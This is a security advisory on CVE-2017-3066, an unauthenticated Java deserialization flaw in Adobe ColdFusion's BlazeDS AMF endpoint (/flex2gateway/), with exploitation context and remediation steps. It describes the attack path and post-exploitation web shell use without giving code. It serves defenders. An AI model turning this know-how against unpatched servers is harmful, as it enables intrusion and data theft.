CVE-2017-3066

What Is Adobe ColdFusion?

Adobe ColdFusion is a commercial Java-based web application server platform widely used in enterprise, government, and higher education environments to run ColdFusion Markup Language (CFML) web applications. ColdFusion servers commonly host internal business applications — HR portals, financial reporting, data management — and often have direct database access. ColdFusion has historically been a high-value target for web shell deployment; its integration with the BlazeDS library for Adobe Flex/RIA communication introduced a Java deserialization attack surface on the ColdFusion HTTP endpoint.

Overview

CVE-2017-3066 is a critical Java deserialization vulnerability in Adobe ColdFusion via the bundled Apache BlazeDS library. BlazeDS is used by ColdFusion to support Adobe Flex/RIA AMF (Action Message Format) communication; its AMF deserialization channel accepts serialized Java objects without sufficient class restriction, enabling an unauthenticated attacker to send a crafted AMF request that triggers arbitrary code execution. Fixed in ColdFusion 10 Update 23, ColdFusion 11 Update 12, and ColdFusion 2016 Update 4 via Adobe Security Bulletin APSB17-14. CISA added CVE-2017-3066 to the KEV catalog in February 2025, nearly eight years after the patch, reflecting ongoing targeting of unpatched ColdFusion deployments.

Affected Versions

Technical Details

Root Cause: Apache BlazeDS AMF Deserialization Without Class Restriction

CVE-2017-3066 is a deserialization vulnerability (CWE-502) in the Apache BlazeDS library bundled with ColdFusion. BlazeDS implements AMF (Action Message Format) — a binary serialization protocol used by Adobe Flex RIA clients to communicate with server-side Java code. ColdFusion exposes a BlazeDS AMF endpoint (typically at /flex2gateway/) that accepts AMF-encoded requests.

The attack: The BlazeDS AMF deserializer processes incoming Java objects from the AMF request body without adequately restricting which Java classes can be instantiated. An attacker can craft a malicious AMF payload containing a serialized gadget chain — a sequence of Java class operations that, when deserialized, executes arbitrary OS commands. This is the same class of attack exploited in CVE-2017-10271 (Oracle WebLogic XMLDecoder) and CVE-2017-1000353 (Jenkins).

No authentication required: The /flex2gateway/ BlazeDS endpoint is publicly accessible by design (Flex clients access it directly), so exploitation requires only network access to the ColdFusion HTTP port.

Attack Characteristics

Discovery

Reported to Adobe and patched in April 2017 via APSB17-14. The BlazeDS AMF deserialization class was part of the broader Java deserialization exploitation wave that affected multiple platforms in 2017.

Exploitation Context

• ColdFusion targeted campaigns: ColdFusion servers are persistently targeted for web shell deployment; threat actors specifically probe for known ColdFusion vulnerabilities (APSB advisories) because ColdFusion hosts are often older, less monitored, and run in internal enterprise environments with database access
• Late KEV addition (2025): The eight-year gap between patch and KEV addition (February 2025) reflects that threat actors are still finding and exploiting ColdFusion deployments running versions from 2017 or earlier; enterprise ColdFusion updates are often deferred due to application compatibility concerns
• Post-exploitation patterns: After initial access via CVE-2017-3066, attackers typically deploy a ColdFusion web shell (.cfm file) for persistent access, then use ColdFusion's native database query capabilities to extract data or pivot to connected database servers
• CISA KEV (2025): Added February 24, 2025 alongside other long-unpatched ColdFusion vulnerabilities, reflecting sustained nation-state and cybercriminal interest in ColdFusion infrastructure

Remediation

1. Apply ColdFusion security updates — update to ColdFusion 10 Update 23+, ColdFusion 11 Update 12+, or ColdFusion 2016 Update 4+ to patch CVE-2017-3066. Preferably, migrate to a currently supported ColdFusion version (ColdFusion 2023 or later) which has received many subsequent security fixes.

2. Disable the BlazeDS AMF endpoint if not used — if Flex/RIA functionality is not required, disable the /flex2gateway/ endpoint in ColdFusion Administrator to eliminate the AMF deserialization attack surface entirely.

3. Restrict network access to ColdFusion — ColdFusion should not be directly internet-accessible; place it behind a reverse proxy or WAF that can filter malicious AMF requests and restrict access to known application endpoints.

4. Audit for web shells — check the ColdFusion webroot and custom application directories for .cfm files not part of the original deployment; web shells installed via CVE-2017-3066 look like legitimate ColdFusion files and can persist for years undetected.

5. Apply Adobe's ColdFusion lockdown guide — Adobe publishes a ColdFusion Lockdown Guide with hardening steps specific to each ColdFusion version; follow it to disable unnecessary features and restrict the attack surface beyond patch application.